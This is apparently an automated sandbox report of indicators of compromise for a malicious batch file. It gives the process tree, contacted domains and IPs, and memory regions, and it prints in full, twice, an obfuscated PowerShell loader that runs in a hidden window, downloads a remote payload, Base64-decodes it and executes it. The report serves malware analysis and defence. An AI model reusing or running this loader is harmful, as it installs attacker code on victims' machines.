IOC Report
Ordine_doc_419024001904.bat

Ordine_doc_419024001904.bat

ASCII text, with very long lines (2865), with no line terminators

initial sample

C:\Windows\System32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Ordine_doc_419024001904.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -windowstyle hidden "$Huisher = 1;$Sstersnner225='Substrin';$Sstersnner225+='g';Function Orthographising($N){$Tarantass=$N.Length-$Huisher;For($Glamouriserende=1; $Glamouriserende -lt $Tarantass; $Glamouriserende+=(2)){$Sprogrgter+=$N.$Sstersnner225.Invoke($Glamouriserende, $Huisher);}$Sprogrgter;}function Kneblende($Arveprinsen){.($Sammenkrbet) ($Arveprinsen);}$Drkarm=Orthographising 'KM oSzKi.l l aN/ 5T.S0S (RWNi n,dBoEwFsL N.T. A1E0 .S0N; .WDiUnP6g4T; Sx 6 4u; TrSvK: 1 2 1 . 0C) FG,eTc k,oE/,2,0 1Y0O0J1T0m1. CFUi rRe fSo.xB/,1,2K1F.S0 ';$Nonexultation74=Orthographising ',UlsFe,rT-BADgTe n.t. ';$Rekrutteredes=Orthographising 'sh.t tApC:S/./t8K7T. 1.2K1.. 1 0.5..,1C6.3,/.S kSaAb s,. a sCdS ';$Forprvens=Orthographising '.>. ';$Sammenkrbet=Orthographising 'Bi.eRxU ';$Greasing = Orthographising ' e c,h oH % a p p,dfa,t a %.\ SSpAeBcOiRf,i,c.eSrUicn ghsm.pLIiRtR ,&B&B e,cHhPo, J$, ';Kneblende (Orthographising 'D$PgLlsoRb aClS: P r oFn o,m iGa,lS9 9V=u(YcRmBd M/pcF E$CG rSe,aAsSiSnFg )S ');Kneblende (Orthographising 'L$EgLlTo,bWaSl,: URnSr eAsIiUlTiBeSnCtR= $.R e kCr uFtWt,e rJe d e sC.AsTp,l i tS(S$.F,o rWp.r,v e.nUsA)S ');$Rekrutteredes=$Unresilient[0];Kneblende (Orthographising 'D$ gGlKo b,a lS:EE nTcRhFeIq uFeGrF=kNLeFw,-BO b.j e,c t STySsBtPe m .CN,e t,..W eAb,C.laiFeSn t ');Kneblende (Orthographising ' $.E,nAcThDeLqFuTeCr.. HKeIa dBe r.s [ $SN o.n e x u l,tUa tTiTo.n 7 4P] =,$.DarFk.a r,mT ');$Triptych=Orthographising 'VE nOc hPeKq ube r,.,D obw nAlNoTa.d F.i l e,(V$AR e kKrLu tKtie.rVe dCeAs.,h$ a cRl yidSe.sS)U ';$Triptych=$Pronomial99[1]+$Triptych;$aclydes=$Pronomial99[0];Kneblende (Orthographising ' $ogOlBoVb a l : I.n tSrSo.dFuBc ePr =,(LTOeSsTt -,PUa t hM $Ra cUl.yWdJeSs ) ');while (!$Introducer) {Kneblende (Orthographising ',$Kg lIovbSaulL:ES p e kMt r.o s kDo pL= $,tMr u.e. ') ;Kneblende $Triptych;Kneblende (Orthographising 'FS.tSa.r t -BS l e eUpo A4 ');Kneblende (Orthographising ' $,g lHoMb a lC:cIKn t r o.dBu,cbeUr = (HTSe s,tG-UP.a t.h .$.aCcSl ygdHessL)F ') ;Kneblende (Orthographising '.$.gFlPo bTaMl :TB,e tPr,oAt h eTd s,=S$Mg.l oLbEaSl.:DB e,t tVe dI+.+,%B$ UVnGr.eEs.iAl i e.n,tS. c oEuBn t ') ;$Rekrutteredes=$Unresilient[$Betrotheds];}Kneblende (Orthographising 'F$DgKl o bia l :tD o,wInTrHu sGh iCn,gU = DG e t -,CSoDn t e n t H$.a.cSlLyGdSeRs ');Kneblende (Orthographising ' $ g.lTo b,awl :FPSr iTm eRrSs F=, [AS,ySsCt,e mH. COo n vQePr.t ]g:p:SF.rDo muB aTs,eS6.4 SSt,r i.nUgG(.$ DSo w nUrMu s h iDnEgR), ');Kneblende (Orthographising 'S$ gSlVoTbMaTl :,KVv iPsUt s P=W [MS.yAs t.e,mT.NTCe.xSt,..E n.cMoSd i.nig,] : :DAGSSC.IhIU. GTett SLtEr iVn.g,(,$TP.r,iCmReMr s,) ');Kneblende (Orthographising ',$Og lCoRb a,lT:,T e gSn.eKp r.o cSe.dPu rpeMrFnDe s,=.$ KOvHi s t s .As u.bKs.tBrKi,n.g,(.3 0L6.9S4C4., 2T6u1S9G0 ) ');Kneblende $Tegneprocedurernes;"

C:\Windows\System32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Specificerings.Lit && echo $"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Huisher = 1;$Sstersnner225='Substrin';$Sstersnner225+='g';Function Orthographising($N){$Tarantass=$N.Length-$Huisher;For($Glamouriserende=1; $Glamouriserende -lt $Tarantass; $Glamouriserende+=(2)){$Sprogrgter+=$N.$Sstersnner225.Invoke($Glamouriserende, $Huisher);}$Sprogrgter;}function Kneblende($Arveprinsen){.($Sammenkrbet) ($Arveprinsen);}$Drkarm=Orthographising 'KM oSzKi.l l aN/ 5T.S0S (RWNi n,dBoEwFsL N.T. A1E0 .S0N; .WDiUnP6g4T; Sx 6 4u; TrSvK: 1 2 1 . 0C) FG,eTc k,oE/,2,0 1Y0O0J1T0m1. CFUi rRe fSo.xB/,1,2K1F.S0 ';$Nonexultation74=Orthographising ',UlsFe,rT-BADgTe n.t. ';$Rekrutteredes=Orthographising 'sh.t tApC:S/./t8K7T. 1.2K1.. 1 0.5..,1C6.3,/.S kSaAb s,. a sCdS ';$Forprvens=Orthographising '.>. ';$Sammenkrbet=Orthographising 'Bi.eRxU ';$Greasing = Orthographising ' e c,h oH % a p p,dfa,t a %.\ SSpAeBcOiRf,i,c.eSrUicn ghsm.pLIiRtR ,&B&B e,cHhPo, J$, ';Kneblende (Orthographising 'D$PgLlsoRb aClS: P r oFn o,m iGa,lS9 9V=u(YcRmBd M/pcF E$CG rSe,aAsSiSnFg )S ');Kneblende (Orthographising 'L$EgLlTo,bWaSl,: URnSr eAsIiUlTiBeSnCtR= $.R e kCr uFtWt,e rJe d e sC.AsTp,l i tS(S$.F,o rWp.r,v e.nUsA)S ');$Rekrutteredes=$Unresilient[0];Kneblende (Orthographising 'D$ gGlKo b,a lS:EE nTcRhFeIq uFeGrF=kNLeFw,-BO b.j e,c t STySsBtPe m .CN,e t,..W eAb,C.laiFeSn t ');Kneblende (Orthographising ' $.E,nAcThDeLqFuTeCr.. HKeIa dBe r.s [ $SN o.n e x u l,tUa tTiTo.n 7 4P] =,$.DarFk.a r,mT ');$Triptych=Orthographising 'VE nOc hPeKq ube r,.,D obw nAlNoTa.d F.i l e,(V$AR e kKrLu tKtie.rVe dCeAs.,h$ a cRl yidSe.sS)U ';$Triptych=$Pronomial99[1]+$Triptych;$aclydes=$Pronomial99[0];Kneblende (Orthographising ' $ogOlBoVb a l : I.n tSrSo.dFuBc ePr =,(LTOeSsTt -,PUa t hM $Ra cUl.yWdJeSs ) ');while (!$Introducer) {Kneblende (Orthographising ',$Kg lIovbSaulL:ES p e kMt r.o s kDo pL= $,tMr u.e. ') ;Kneblende $Triptych;Kneblende (Orthographising 'FS.tSa.r t -BS l e eUpo A4 ');Kneblende (Orthographising ' $,g lHoMb a lC:cIKn t r o.dBu,cbeUr = (HTSe s,tG-UP.a t.h .$.aCcSl ygdHessL)F ') ;Kneblende (Orthographising '.$.gFlPo bTaMl :TB,e tPr,oAt h eTd s,=S$Mg.l oLbEaSl.:DB e,t tVe dI+.+,%B$ UVnGr.eEs.iAl i e.n,tS. c oEuBn t ') ;$Rekrutteredes=$Unresilient[$Betrotheds];}Kneblende (Orthographising 'F$DgKl o bia l :tD o,wInTrHu sGh iCn,gU = DG e t -,CSoDn t e n t H$.a.cSlLyGdSeRs ');Kneblende (Orthographising ' $ g.lTo b,awl :FPSr iTm eRrSs F=, [AS,ySsCt,e mH. COo n vQePr.t ]g:p:SF.rDo muB aTs,eS6.4 SSt,r i.nUgG(.$ DSo w nUrMu s h iDnEgR), ');Kneblende (Orthographising 'S$ gSlVoTbMaTl :,KVv iPsUt s P=W [MS.yAs t.e,mT.NTCe.xSt,..E n.cMoSd i.nig,] : :DAGSSC.IhIU. GTett SLtEr iVn.g,(,$TP.r,iCmReMr s,) ');Kneblende (Orthographising ',$Og lCoRb a,lT:,T e gSn.eKp r.o cSe.dPu rpeMrFnDe s,=.$ KOvHi s t s .As u.bKs.tBrKi,n.g,(.3 0L6.9S4C4., 2T6u1S9G0 ) ');Kneblende $Tegneprocedurernes;"

C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"

C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe

"C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe"

C:\Windows\SysWOW64\AtBroker.exe

"C:\Windows\SysWOW64\AtBroker.exe"

C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe

"C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe"

C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"

C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"

http://pesterbdd.com/images/Pester.png

unknown

http://www.oyoing.com/gnbc/

91.195.240.19

http://www.tyaer.com/gnbc/?5b=L9JeOsoYfW7LuiHaclFiXmHOc0YYKxwC8gDNcZo86ZNgoJ0Ky4PaH7PNod07P46PC5yTK57EcxKk26T8ts7dcr46kIfYIZ8tiScezyY+sUlmUz9chnLJzCyoHk2LugWc+g==&wD=mjvh1V4x

47.91.88.207

www.tyaer.com

47.91.88.207

www.oyoing.com

unknown

47.91.88.207

www.tyaer.com

United States

23890000

unclassified section

page execute and read and write

1681C8C1000

trusted library allocation

page read and write

BF7B000

direct allocation

page execute and read and write

1030000

system

page execute and read and write

28A0000

trusted library allocation

page read and write

22C0000

unkown

page execute and read and write

2860000

trusted library allocation

page read and write

3A0000

system

page execute and read and write

8470000

direct allocation

page execute and read and write

5982000

trusted library allocation

page read and write